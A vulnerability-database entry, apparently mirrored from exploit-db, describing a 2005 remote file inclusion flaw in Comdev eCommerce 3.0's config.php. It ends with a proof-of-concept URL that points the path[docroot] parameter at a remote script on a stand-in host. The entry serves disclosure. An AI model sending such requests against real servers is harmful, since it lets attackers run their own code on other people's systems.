Comdev eCommerce 3.0 - 'config.php' Remote File Inclusion

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1055322 漏洞类型
发布时间 2005-08-05 更新时间 2005-08-05
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/26079
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/14478/info

Comdev eCommerce is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.

This issue reportedly affect Comdev eCommerce version 3.0; other versions may also be vulnerable. 

http://www.example.com/oneadmin/config.php?path[docroot]=http://www.example.com/badscript.php.txt